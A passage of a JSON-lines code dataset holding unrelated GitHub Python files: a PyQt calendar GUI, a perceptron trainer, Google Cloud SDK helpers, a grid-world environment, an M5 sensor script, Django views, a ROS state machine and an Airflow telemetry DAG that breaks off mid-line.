self.history) for event in self.apiEvents])\n\n ready, undoable, foreign = len(self.readyEvents), len(self.history), len(list(self.getForeign()))\n total = ready + undoable + foreign\n self.eventCountLabel.setText(f'{len(self.readyEvents)} ready, {undoable} undoable, {foreign} foreign ({total})')\n\n self.eventsView.setRowCount(len(events))\n logger.debug(f'Populating table with {self.eventsView.rowCount()} events.')\n for row, event in enumerate(events):\n logger.debug(f'Event \"{event.summary}\" starts {event.start} and ends {event.end}')\n event.fill_row(row, self.eventsView)\n\n self.submitButton.setDisabled(len(self.readyEvents) < 0)\n\n @QtCore.pyqtSlot(int)\n def comboBoxChanged(self, row) -> None:\n \"\"\"When the Calendar Selection combobox\"\"\"\n self.currentCalendarID = self.comboModel.item(row).data()\n logger.info(f'Switching to Calendar \"{self.comboModel.item(row).text()} ({self.currentCalendarID})\"')\n self.populate()\n","repo_name":"Xevion/bulk-reminders","sub_path":"bulk_reminders/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"34660608875","text":"def compute_rolling(new_cols, current_cols, teams):\n\n teams = teams.sort_values('Date')\n five_day_ave = teams[current_cols].rolling(5,closed ='left').mean()\n teams[new_cols] = five_day_ave\n\n\n if len(teams) == 31:\n # get the teams rank, from their most recent game.\n\n recent_rank = teams.iloc[len(teams)- 2]['Rank']\n teams.at[teams.index[len(teams) -1],'Rank'] = recent_rank\n\n elif len(teams) == 32:\n\n #accout for double headers \n recent_rank = teams.iloc[len(teams)- 3]['Rank']\n teams.at[teams.index[len(teams) -2],'Rank'] = recent_rank\n\n # save index to reassgin\n prev_index = teams.iloc[len(teams)-1][0]\n\n # set the double header games to the same values\n teams.iloc[len(teams)-1]= teams.iloc[len(teams)-2]\n teams.at[teams.index[len(teams) -1],0] = prev_index\n\n teams = teams.dropna(subset=new_cols)\n\n return teams\n\n\ndef create_roll_avg(games,new_cols,aver_cols):\n\n # group and compute the rolling averages for each team over teh last 5 games\n games_averages = games.groupby('Tm').apply(lambda x: compute_rolling(new_cols, aver_cols, x))\n games_averages= games_averages.droplevel('Tm')\n games_averages.index = range(games_averages.shape[0])\n return games_averages\n","repo_name":"dvholmes/twitter_bot","sub_path":"mlbpredictor/additional_functions/rolling_coverter.py","file_name":"rolling_coverter.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74815805982","text":"import numpy as np\r\nimport csv\r\n\r\n# Función para leer los patrones desde un archivo CSV\r\ndef leer_patrones(filename):\r\n entradas = []\r\n salidas = []\r\n with open(filename, mode='r', newline='') as file:\r\n csv_reader = csv.reader(file)\r\n for row in csv_reader:\r\n entradas.append([float(x) for x in row[:-1]])\r\n salidas.append(float(row[-1]))\r\n return np.array(entradas), np.array(salidas)\r\n\r\ndef activacion(pesos,x,b):\r\n z=pesos * x\r\n if z.sum() + b > 0:\r\n return 1\r\n else:\r\n return -1\r\n\r\ndef probando(pesos,x,b):\r\n z=pesos * x\r\n if z.sum() + b > 0 :\r\n return -1\r\n else:\r\n return 1\r\n\r\n# Función para entrenar un perceptrón simple\r\ndef entrenar_perceptron(entradas, salidas, tasa_aprendizaje, max_epocas, criterio_error):\r\n num_entradas = entradas.shape[1]\r\n num_patrones = entradas.shape[0]\r\n\r\n # Inicialización de pesos y bias\r\n pesos = np.random.uniform(-1,1,size=2)\r\n print(f\"{pesos}\")\r\n bias = np.random.uniform(-1,1)\r\n epoca=0\r\n \r\n for epoca in range(max_epocas):\r\n error_epoca=0\r\n print(f\"texto largoteeeeeeeeeeeeeeeee{epoca}\")\r\n for i in range(num_patrones):\r\n prediccion=activacion(pesos,entradas[i],bias)\r\n error= salidas[i]-prediccion\r\n\r\n pesos[0] += tasa_aprendizaje * entradas[i][0] * error\r\n pesos[1] += tasa_aprendizaje * entradas[i][1] * error\r\n bias += tasa_aprendizaje * error\r\n error_epoca += error**2\r\n print(f\"{error},{epoca},{bias},{pesos}\")\r\n print(f\"{error_epoca}\")\r\n\r\n return pesos, bias\r\n\r\n# Función para probar el perceptrón entrenado en datos reales\r\ndef probar_perceptron(entradas, pesos, bias):\r\n num_patrones = entradas.shape[0]\r\n resultados = []\r\n\r\n for i in range(num_patrones):\r\n prediccion=probando(pesos,entradas[i],bias)\r\n resultados.append(prediccion)\r\n\r\n return resultados\r\n\r\nif __name__ == \"__main__\":\r\n # Lee los patrones de entrenamiento desde un archivo CSV\r\n archivo_entrenamiento = \"patrones_entrenamiento.csv\"\r\n entradas, salidas = leer_patrones(archivo_entrenamiento)\r\n\r\n # Configura los hiperparámetros\r\n tasa_aprendizaje = 0.01\r\n max_epocas = 1000\r\n criterio_error = 1\r\n\r\n # Entrena el perceptrón\r\n pesos, bias = entrenar_perceptron(entradas, salidas, tasa_aprendizaje, max_epocas, criterio_error)\r\n print(f\"{pesos} y {bias}\")\r\n\r\n # Lee los patrones de prueba desde otro archivo CSV\r\n archivo_prueba = \"XOR_tst.csv\"\r\n entradas_prueba, salidas_prueba = leer_patrones(archivo_prueba)\r\n\r\n # Prueba el perceptrón entrenado en datos de prueba\r\n resultados_prueba = probar_perceptron(entradas_prueba, pesos, bias)\r\n\r\n print(\"Resultados de prueba:\")\r\n for i, resultado in enumerate(resultados_prueba):\r\n print(f\"Entrada: {entradas_prueba[i]}, Salida: {resultado}\")\r\n","repo_name":"DaraFengari/Perceptron","sub_path":"Perceptron.py","file_name":"Perceptron.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27765065479","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.command_lib.util.apis import arg_utils\n\nPERSISTENT_RESOURCE_COLLECTION = 'aiplatform.projects.locations.persistentResources'\n\n\ndef _ConstructSingleResourcePoolSpec(aiplatform_client,\n spec):\n \"\"\"Constructs a single resource pool spec.\n\n Args:\n aiplatform_client: The AI Platform API client used.\n spec: A dict whose fields represent a resource pool spec.\n\n Returns:\n A ResourcePoolSpec message instance for setting a resource pool in a\n Persistent Resource\n \"\"\"\n resource_pool = aiplatform_client.GetMessage('ResourcePool')()\n\n machine_spec_msg = aiplatform_client.GetMessage('MachineSpec')\n machine_spec = machine_spec_msg(machineType=spec.get('machine-type'))\n accelerator_type = spec.get('accelerator-type')\n if accelerator_type:\n machine_spec.acceleratorType = arg_utils.ChoiceToEnum(\n accelerator_type, machine_spec_msg.AcceleratorTypeValueValuesEnum)\n machine_spec.acceleratorCount = int(spec.get('accelerator-count', 1))\n resource_pool.machineSpec = machine_spec\n\n replica_count = spec.get('replica-count')\n if replica_count:\n resource_pool.replicaCount = int(replica_count)\n min_replica_count = spec.get('min-replica-count')\n max_replica_count = spec.get('max-replica-count')\n if min_replica_count or max_replica_count:\n autoscaling_spec = (\n aiplatform_client.GetMessage('ResourcePoolAutoscalingSpec')())\n autoscaling_spec.minReplicaCount = int(min_replica_count)\n autoscaling_spec.maxReplicaCount = int(max_replica_count)\n resource_pool.autoscalingSpec = autoscaling_spec\n\n disk_type = spec.get('disk-type')\n disk_size = spec.get('disk-size')\n if disk_type:\n disk_spec_msg = aiplatform_client.GetMessage('DiskSpec')\n disk_spec = disk_spec_msg(bootDiskType=disk_type, bootDiskSizeGb=disk_size)\n resource_pool.diskSpec = disk_spec\n\n return resource_pool\n\n\ndef _ConstructResourcePoolSpecs(aiplatform_client, specs, **kwargs):\n \"\"\"Constructs the resource pool specs for a persistent resource.\n\n Args:\n aiplatform_client: The AI Platform API client used.\n specs: A list of dict of resource pool specs, supposedly derived from\n the gcloud command flags.\n **kwargs: The keyword args to pass down to construct each worker pool spec.\n\n Returns:\n A list of ResourcePool message instances for creating a Persistent Resource.\n \"\"\"\n resource_pool_specs = []\n\n for spec in specs:\n if spec:\n resource_pool_specs.append(\n _ConstructSingleResourcePoolSpec(aiplatform_client, spec, **kwargs))\n else:\n resource_pool_specs.append(\n aiplatform_client.GetMessage('ResourcePoolSpec')())\n\n return resource_pool_specs\n\n\ndef ConstructResourcePools(\n aiplatform_client,\n persistent_resource_config=None,\n resource_pool_specs=None,\n **kwargs\n):\n \"\"\"Constructs the resource pools to be used to create a Persistent Resource.\n\n Resource pools from the config file and arguments will be combined.\n\n Args:\n aiplatform_client: The AI Platform API client used.\n persistent_resource_config: A Persistent Resource configuration imported\n from a YAML config.\n resource_pool_specs: A dict of worker pool specification, usually derived\n from the gcloud command argument values.\n **kwargs: The keyword args to pass to construct the worker pool specs.\n\n Returns:\n An array of ResourcePool messages for creating a Persistent Resource.\n \"\"\"\n\n resource_pools = []\n if isinstance(persistent_resource_config.resourcePools, list):\n resource_pools = persistent_resource_config.resourcePools\n if resource_pool_specs:\n resource_pools = resource_pools + _ConstructResourcePoolSpecs(\n aiplatform_client, resource_pool_specs, **kwargs)\n\n return resource_pools\n\n\ndef _IsKwargsDefined(key, **kwargs):\n return key in kwargs and bool(kwargs.get(key))\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/ai/persistent_resources/persistent_resource_util.py","file_name":"persistent_resource_util.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"30663954739","text":"from typing import List\n\n\nclass Solution:\n def threeEqualParts(self, A: List[int]) -> List[int]:\n def traverse(front, part):\n i = front - 1\n while A[i] == 0:\n i -= 1\n zeros[part] = front - 1 - i\n j = i\n freq = 1\n while freq < count:\n i -= 1\n if A[i] == 1:\n freq += 1\n return i, j\n\n if len(A) < 3:\n return [-1, -1]\n count = sum(A)\n if count == 0:\n return [0, 2]\n if count % 3:\n return [-1, -1]\n count /= 3\n zeros = [0] * 3\n\n i2, j2 = traverse(len(A), 2)\n i1, j1 = traverse(i2, 1)\n if zeros[2] > zeros[1] or j2 - i2 != j1 - i1:\n return [-1, -1]\n i0, j0 = traverse(i1, 0)\n if zeros[2] > zeros[0] or j1 - i1 != j0 - i0:\n return [-1, -1]\n if A[i0:j0] == A[i1:j1] == A[i2:j2]:\n return [j0 + zeros[2], j1 + 1 + zeros[2]]\n else:\n return [-1, -1]\n\n\nprint(Solution().threeEqualParts([1, 1, 0, 0, 1]))\n","repo_name":"yutao-li/leetcode","sub_path":"927.py","file_name":"927.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26806892803","text":"import random\nfrom enum import Enum\n\n\nclass Objects(Enum):\n NOTHING = 0.0\n GOAL = 100.0\n BOMB = -50.0\n OBSTACLE = -100\n\n\nclass GridWorld:\n def __init__(self, width, height, bombs, rewards):\n self.width = width\n self.height = height\n self.room_width = self.room_height = 5\n\n self.grid, self.current_grid, self.last_grid = self.fill_grids()\n\n self.corridors = self.place_corridors()\n self.place_walls()\n self.bombs_coordinates = self.place_item(bombs, Objects.BOMB)\n self.rewards_coordinates = self.place_item(rewards, Objects.GOAL)\n\n def __str__(self):\n return f'GridWorld {self.width}x{self.height}'\n\n def print_world(self):\n for row in self.current_grid:\n for elem in row:\n if elem == Objects.OBSTACLE.value:\n print(\"{:>10}\".format(\"####\"), end='')\n else:\n print(\"{:>10.2f}\".format(elem), end='')\n\n print()\n\n print()\n\n def fill_grids(self):\n return [[Objects.NOTHING for _ in range(self.width)] for _ in range(self.height)], \\\n [[Objects.NOTHING.value for _ in range(self.width)] for _ in range(self.height)], \\\n [[Objects.NOTHING.value for _ in range(self.width)] for _ in range(self.height)]\n\n def random_coordinates(self):\n x, y = random.randint(0, self.width - 1), random.randint(0, self.height - 1)\n\n while self.grid[x][y] != Objects.NOTHING or self.grid[x][y] == Objects.OBSTACLE:\n x, y = random.randint(0, self.width - 1), random.randint(0, self.height - 1)\n\n return x, y\n\n def place_corridors(self):\n corridors_coords = []\n current_width, current_height = self.room_width - 1, self.room_height - 1\n\n for i in range(0, self.width, self.room_width):\n for j in range(0, self.height, self.room_height):\n if current_width < self.width - 1:\n temp_side = random.randint(i, min(current_height - 1, self.height - 1))\n corridors_coords.append((temp_side, current_width))\n\n if current_height < self.height - 1:\n temp_bottom = random.randint(j, min(current_width - 1, self.width - 1))\n corridors_coords.append((current_height, temp_bottom))\n\n current_width += self.room_width\n\n current_height += self.room_height\n current_width = self.room_width - 1\n\n return corridors_coords\n\n def place_walls(self):\n side, bottom = self.room_height, self.room_height\n\n while bottom < self.width:\n for horizontal in range(0, self.width):\n if bottom < self.width and (bottom - 1, horizontal) not in self.corridors:\n self.grid[min(bottom - 1, self.width - 1)][horizontal] = Objects.OBSTACLE\n self.current_grid[min(bottom - 1, self.width - 1)][horizontal] = Objects.OBSTACLE.value\n self.last_grid[min(bottom - 1, self.width - 1)][horizontal] = Objects.OBSTACLE.value\n\n bottom += self.room_width\n\n while side < self.height:\n for vertical in range(0, self.height):\n if (vertical, side - 1) not in self.corridors:\n self.grid[vertical][min(side - 1, self.height - 1)] = Objects.OBSTACLE\n self.current_grid[vertical][min(side - 1, self.height - 1)] = Objects.OBSTACLE.value\n self.last_grid[vertical][min(side - 1, self.height - 1)] = Objects.OBSTACLE.value\n\n side += self.room_height\n\n return None\n\n def place_item(self, amount, item):\n coords = []\n\n for _ in range(amount):\n x, y = self.random_coordinates()\n\n while (x, y) in self.corridors:\n x, y = self.random_coordinates()\n\n coords.append((x, y))\n self.grid[x][y] = item\n self.current_grid[x][y] = item.value\n self.last_grid[x][y] = item.value\n\n return coords\n","repo_name":"Yakorrr/AI","sub_path":"labs/lab3/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21131081628","text":"# use analog-to-digital converter (ADC) to read analog input on pin G1,\n# convert the value to 8 bits (0 - 255 range) and print it\n\nimport os, sys, io\nimport M5\nfrom M5 import *\nfrom hardware import *\nimport time\n\nadc = None\nadc_val = None\nadc_timer = 0\nadc_calib_val = None\n\n\ndef setup():\n global adc, adc_val, adc_timer, adc_calib_val\n M5.begin()\n # configure ADC input on pin G1 with 11dB attenuation:\n adc = ADC(Pin(2), atten=ADC.ATTN_11DB)\n time.sleep_ms(500)\n adc_calib_val = adc.read() -100\n #print('save calibration value...',adc_calib_val)\n \n \n\ndef loop():\n global adc, adc_val, adc_timer\n M5.update()\n if BtnA.wasPressed():\n sensor_calibrate()\n \n \n #\n if (time.ticks_ms() > adc_timer + 100):\n # read 12-bit analog value (0 - 4095 range):\n adc_val = adc.read()\n #print(adc_val)\n # convert adc_val from 12-bit to 8-bit (0 - 255 range):\n adc_val_8bit = map_value(adc_val, in_min = 0, in_max = 4095,\n out_min = 0, out_max = 255)\n print(adc_val_8bit)\n #time.sleep_ms(100)\n adc_timer = time.ticks_ms()\n if(adc_val < adc_calib_val - 100):\n print('sensor low..')\n else:\n print('sensor high..')\n \n \n \ndef sensor_calibrate():\n global adc_calib_val\n adc_calib_val = adc.read()-100\n print('save calibration value...',adc_calib_val)\n \n\n\n\n\n\n\n# map an input value (v_in) between min/max ranges:\ndef map_value(in_val, in_min, in_max, out_min, out_max):\n v = out_min + (in_val - in_min) * (out_max - out_min) / (in_max - in_min)\n if (v < out_min): \n v = out_min \n elif (v > out_max): \n v = out_max\n return int(v)\n\nif __name__ == '__main__':\n try:\n setup()\n while True:\n loop()\n except (Exception, KeyboardInterrupt) as e:\n try:\n from utility import print_error_msg\n print_error_msg(e)\n except ImportError:\n print(\"please update to latest firmware\")\n\n\n","repo_name":"galinajialinzhu/Adv-prototyping","sub_path":"InClassDemo/OCT20_0840_lightresistor.py","file_name":"OCT20_0840_lightresistor.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29617359129","text":"from pickle import TRUE\nfrom .models import BookShelf\nfrom .serializer import BookShelfSerializer\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\n\n\n\n@api_view(['GET'])\ndef BookShelf_Details(request):\n \n if request.method =='GET':\n data=BookShelf.objects.all()\n serializer=BookShelfSerializer(data,many=TRUE)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef BookShelf_SingleRecord(request,pk):\n \n if request.method =='GET':\n data=BookShelf.objects.get(id=pk)\n serializer=BookShelfSerializer(data)\n return Response(serializer.data)\n \n \n@api_view(['POST'])\ndef Add_Record(request):\n\n if request.method =='POST':\n serializer=BookShelfSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST) ","repo_name":"ancorp134/Internship-task","sub_path":"Django task/bookshelf/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"880896071","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon 31 June 3:40:00 2013\n\n@author: Chang Long Zhu\n@email: changlongzj@gmail.com\n\"\"\"\n\nimport rospy\nimport smach\nimport actionlib\nfrom rospy.core import rospyinfo\nfrom smach_ros import ServiceState\n\nfrom navigation_states.nav_to_poi import nav_to_poi\nfrom speech_states.say import text_to_say \n\nENDC = '\\033[0m'\nFAIL = '\\033[91m'\nOKGREEN = '\\033[92m'\n\n\nclass prepare_state(smach.State):\n \n def __init__(self,nav_to_poi_name,tts_text):\n \n smach.State.__init__(self, outcomes=['succeeded', 'aborted', 'preempted'],\n input_keys=['tts_text','nav_to_poi_name'],\n output_keys=['tts_text','nav_to_poi_name'])\n \n self.nav_to_poi_name = nav_to_poi_name\n self.tts_text = tts_text\n \n def execute(self, userdata):\n \n if userdata.tts_text == None :\n userdata.tts_text = self.tts_text\n if userdata.nav_to_poi_name == None :\n userdata.nav_to_poi_name = self.nav_to_poi_name\n \n return 'succeeded'\n\n\nclass nav_to_poi_and_say(smach.StateMachine): \n \"\"\"\n This state will move to the POI specified and at the same time says a defined phrase.\n \n - Input Keys:\n @key nav_to_poi_name\n @key tts_text\n\n - Output keys:\n @key standard_error: inform what is the problem\n \n - No io_keys.\n\n \"\"\"\n def __init__(self, nav_to_poi_name = None, tts_text = None):\n smach.StateMachine.__init__(self, outcomes=['succeeded', 'aborted', 'preempted'],\n input_keys=['tts_text','nav_to_poi_name'], \n output_keys=['standard_error'])\n with self:\n self.userdata.tts_lang='en_US'\n self.userdata.tts_wait_before_speaking=0\n \n self.userdata.standard_error='OK'\n \n smach.StateMachine.add(\n 'INIT_VAR',\n prepare_state(nav_to_poi_name, tts_text),\n transitions={'succeeded': 'Concurrence_Say_Nav', 'aborted': 'aborted', \n 'preempted': 'preempted'}) \n \n sm_conc = smach.Concurrence(outcomes=['succeeded', 'preempted','aborted'],\n default_outcome='succeeded',\n input_keys=['tts_text',\n 'nav_to_poi_name',\n 'tts_wait_before_speaking',\n 'tts_lang'])\n with sm_conc:\n sm_conc.add('Say_conc',\n text_to_say())\n\n sm_conc.add('Nav_to_poi_conc',\n nav_to_poi())\n \n smach.StateMachine.add('Concurrence_Say_Nav', \n sm_conc,\n transitions={'succeeded':'succeeded',\n 'aborted':'aborted',\n 'preempted':'preempted'})\n \ndef main():\n rospy.loginfo('nav_to_poi_and_say')\n rospy.init_node('nav_to_poi_and_say_node')\n sm = smach.StateMachine(outcomes=['succeeded', 'preempted', 'aborted'])\n with sm: \n sm.userdata.tts_text = 'I am going to place'\n sm.userdata.nav_to_poi_name = 'kitchen'\n \n smach.StateMachine.add(\n 'nav_to_poi_and_say',\n nav_to_poi_and_say(),\n transitions={'succeeded': 'succeeded','preempted':'preempted', 'aborted':'aborted'})\n\n sm.execute()\n rospy.spin()\n\nif __name__=='__main__':\n main()\n","repo_name":"reem-utils/robocup2014","sub_path":"basic_states/hri_states/src/hri_states/nav_to_poi_and_say.py","file_name":"nav_to_poi_and_say.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"7"} +{"seq_id":"14678043403","text":"from airflow import DAG\nfrom datetime import datetime, timedelta\nfrom airflow.contrib.hooks.aws_hook import AwsHook\nfrom airflow.executors import get_default_executor\nfrom airflow.operators.moz_databricks import MozDatabricksSubmitRunOperator\nfrom airflow.operators.subdag_operator import SubDagOperator\nfrom operators.email_schema_change_operator import EmailSchemaChangeOperator\nfrom utils.dataproc import (\n moz_dataproc_pyspark_runner,\n moz_dataproc_jar_runner,\n get_dataproc_parameters,\n)\nfrom utils.mozetl import mozetl_envvar\nfrom utils.tbv import tbv_envvar\nfrom utils.status import register_status\nfrom utils.gcp import (\n bigquery_etl_query,\n bigquery_etl_copy_deduplicate,\n export_to_parquet,\n load_to_bigquery,\n gke_command,\n)\nfrom utils.forecasting import simpleprophet_forecast\n\n\ndefault_args = {\n 'owner': 'frank@mozilla.com',\n 'depends_on_past': False,\n 'start_date': datetime(2018, 11, 27),\n 'email': ['telemetry-alerts@mozilla.com', 'frank@mozilla.com'],\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 2,\n 'retry_delay': timedelta(minutes=30),\n}\n\n# Make sure all the data for the given day has arrived before running.\n# Running at 1am should suffice.\ndag = DAG('main_summary', default_args=default_args, schedule_interval='0 1 * * *', max_active_runs=10)\n\n# We copy yesterday's main pings from telemetry_live to telemetry_stable\n# at the root of this DAG because telemetry_stable.main_v4 will become\n# the source for main_summary, etc. once we are comfortable retiring parquet\n# data imports.\ncopy_deduplicate_main_ping = bigquery_etl_copy_deduplicate(\n task_id=\"copy_deduplicate_main_ping\",\n target_project_id=\"moz-fx-data-shared-prod\",\n only_tables=[\"telemetry_live.main_v4\"],\n parallelism=24,\n slices=100,\n owner=\"jklukas@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"relud@mozilla.com\", \"jklukas@mozilla.com\"],\n dag=dag)\n\nbq_main_events = bigquery_etl_query(\n task_id=\"bq_main_events\",\n project_id=\"moz-fx-data-shared-prod\",\n destination_table=\"main_events_v1\",\n dataset_id=\"telemetry_derived\",\n owner=\"ssuh@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"ssuh@mozilla.com\"],\n dag=dag,\n arguments=('--schema_update_option=ALLOW_FIELD_ADDITION',),\n)\n\nmain_summary = bigquery_etl_query(\n task_id=\"main_summary\",\n destination_table=\"main_summary_v4\",\n project_id=\"moz-fx-data-shared-prod\",\n dataset_id=\"telemetry_derived\",\n sql_file_path=\"sql/telemetry_derived/main_summary_v4/\",\n multipart=True,\n owner=\"relud@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"relud@mozilla.com\", \"pmcdermott@mozilla.com\", \"dzielaski@mozilla.com\", \"jmundi@mozilla.com\"],\n start_date=datetime(2019, 10, 25),\n dag=dag)\n\nmain_summary_bigint_columns = [\n # bigquery does not have 32-bit int, and int->bigint is not a\n # backward compatible schema change in spark, so these are the\n # bigint columns from when main summary was generated in spark, and\n # the rest are converted to 32-bit int for backward compatibility\n \"--bigint-columns\",\n \"search_counts.count\",\n \"events.timestamp\",\n \"sample_id\",\n \"os_service_pack_major\",\n \"os_service_pack_minor\",\n \"windows_build_number\",\n \"windows_ubr\",\n \"install_year\",\n \"profile_creation_date\",\n \"profile_reset_date\",\n \"session_length\",\n \"subsession_length\",\n \"timestamp\",\n \"e10s_multi_processes\",\n \"active_addons_count\",\n \"client_clock_skew\",\n \"client_submission_latency\",\n \"gc_max_pause_ms_main_above_150\",\n \"gc_max_pause_ms_main_above_250\",\n \"gc_max_pause_ms_main_above_2500\",\n \"gc_max_pause_ms_content_above_150\",\n \"gc_max_pause_ms_content_above_250\",\n \"gc_max_pause_ms_content_above_2500\",\n \"cycle_collector_max_pause_main_above_150\",\n \"cycle_collector_max_pause_main_above_250\",\n \"cycle_collector_max_pause_main_above_2500\",\n \"cycle_collector_max_pause_content_above_150\",\n \"cycle_collector_max_pause_content_above_250\",\n \"cycle_collector_max_pause_content_above_2500\",\n \"input_event_response_coalesced_ms_main_above_150\",\n \"input_event_response_coalesced_ms_main_above_250\",\n \"input_event_response_coalesced_ms_main_above_2500\",\n \"input_event_response_coalesced_ms_content_above_150\",\n \"input_event_response_coalesced_ms_content_above_250\",\n \"input_event_response_coalesced_ms_content_above_2500\",\n \"ghost_windows_main_above_1\",\n \"ghost_windows_content_above_1\",\n]\n\nmain_summary_export = SubDagOperator(\n subdag=export_to_parquet(\n table=\"moz-fx-data-shared-prod:telemetry_derived.main_summary_v4${{ds_nodash}}\",\n static_partitions=[\"submission_date_s3={{ds_nodash}}\"],\n arguments=[\n \"--partition-by=sample_id\",\n \"--replace='{{ds_nodash}}' AS submission_date\",\n \"--maps-from-entries\",\n ] + main_summary_bigint_columns,\n parent_dag_name=dag.dag_id,\n dag_name=\"main_summary_export\",\n default_args=default_args,\n num_workers=40),\n task_id=\"main_summary_export\",\n executor=get_default_executor(),\n dag=dag)\n\nregister_status(main_summary, \"Main Summary\", \"A summary view of main pings.\")\n\naddons = bigquery_etl_query(\n task_id=\"addons\",\n destination_table=\"addons_v2\",\n dataset_id=\"telemetry_derived\",\n dag=dag)\n\naddon_aggregates = bigquery_etl_query(\n task_id=\"addon_aggregates\",\n destination_table=\"addon_aggregates_v2\",\n dataset_id=\"telemetry_derived\",\n owner=\"bmiroglio@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"bmiroglio@mozilla.com\"],\n dag=dag)\n\nmain_summary_experiments_get_experiment_list = gke_command(\n task_id=\"main_summary_experiments_get_experiment_list\",\n command=[\"python3\", \"sql/telemetry_derived/experiments_v1/get_experiment_list.py\", \"{{ds}}\"],\n docker_image=\"mozilla/bigquery-etl:latest\",\n xcom_push=True,\n owner=\"ssuh@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"frank@mozilla.com\", \"ssuh@mozilla.com\", \"robhudson@mozilla.com\"],\n dag=dag)\n\nmain_summary_experiments = bigquery_etl_query(\n task_id=\"main_summary_experiments\",\n destination_table=\"experiments_v1\",\n parameters=(\n \"experiment_list:ARRAY:{{task_instance.xcom_pull('main_summary_experiments_get_experiment_list') | tojson}}\",\n ),\n project_id=\"moz-fx-data-shared-prod\",\n dataset_id=\"telemetry_derived\",\n owner=\"ssuh@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"frank@mozilla.com\", \"ssuh@mozilla.com\", \"robhudson@mozilla.com\"],\n dag=dag)\n\nclients_daily = bigquery_etl_query(\n task_id=\"clients_daily\",\n destination_table=\"clients_daily_v6\",\n project_id=\"moz-fx-data-shared-prod\",\n dataset_id=\"telemetry_derived\",\n owner=\"relud@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"relud@mozilla.com\", \"pmcdermott@mozilla.com\", \"dzielaski@mozilla.com\", \"jmundi@mozilla.com\"],\n start_date=datetime(2019, 11, 5),\n dag=dag)\n\nclients_daily_export = SubDagOperator(\n subdag=export_to_parquet(\n table=\"moz-fx-data-shared-prod:telemetry_derived.clients_daily_v6${{ds_nodash}}\",\n static_partitions=[\"submission_date_s3={{ds_nodash}}\"],\n arguments=[\n # restore legacy schema\n \"--maps-from-entries\",\n \"--partition-by\",\n \"submission_date_s3\",\n \"--drop\",\n \"submission_date\",\n \"total_hours_sum\",\n \"active_experiment_branch\",\n \"active_experiment_id\",\n \"histogram_parent_devtools_canvasdebugger_opened_count_sum\",\n \"histogram_parent_devtools_developertoolbar_opened_count_sum\",\n \"histogram_parent_devtools_shadereditor_opened_count_sum\",\n \"histogram_parent_devtools_webaudioeditor_opened_count_sum\",\n \"scalar_combined_webrtc_nicer_turn_438s_sum\",\n \"scalar_parent_aushelper_websense_reg_version\",\n \"scalar_parent_dom_contentprocess_troubled_due_to_memory_sum\",\n \"--replace\",\n \"STRING(sample_id) AS sample_id\",\n \"CAST(subsession_hours_sum AS DECIMAL(37,6)) AS subsession_hours_sum\",\n \"TRANSFORM(active_addons, _ -> STRUCT(_.addon_id AS addon_id, _.blocklisted AS blocklisted, _.name AS name, _.user_disabled AS user_disabled, _.app_disabled AS app_disabled, _.version AS version, INT(_.scope) AS scope, _.type AS type, _.foreign_install AS foreign_install, _.has_binary_components AS has_binary_components, INT(_.install_day) AS install_day, INT(_.update_day) AS update_day, INT(_.signed_state) AS signed_state, _.is_system AS is_system, _.is_web_extension AS is_web_extension, _.multiprocess_compatible AS multiprocess_compatible)) AS active_addons\",\n \"TRANSFORM(scalar_parent_devtools_accessibility_select_accessible_for_node_sum, _ -> STRUCT(_.key AS key, INT(_.value) AS value)) AS scalar_parent_devtools_accessibility_select_accessible_for_node_sum\",\n \"INT(cpu_cores) AS cpu_cores\",\n \"INT(cpu_count) AS cpu_count\",\n \"INT(cpu_family) AS cpu_family\",\n \"INT(cpu_l2_cache_kb) AS cpu_l2_cache_kb\",\n \"INT(cpu_l3_cache_kb) AS cpu_l3_cache_kb\",\n \"INT(cpu_model) AS cpu_model\",\n \"INT(cpu_speed_mhz) AS cpu_speed_mhz\",\n \"INT(cpu_stepping) AS cpu_stepping\",\n \"INT(memory_mb) AS memory_mb\",\n \"INT(profile_age_in_days) AS profile_age_in_days\",\n \"INT(sandbox_effective_content_process_level) AS sandbox_effective_content_process_level\",\n \"INT(scalar_parent_browser_engagement_max_concurrent_tab_count_max) AS scalar_parent_browser_engagement_max_concurrent_tab_count_max\",\n \"INT(scalar_parent_browser_engagement_max_concurrent_window_count_max) AS 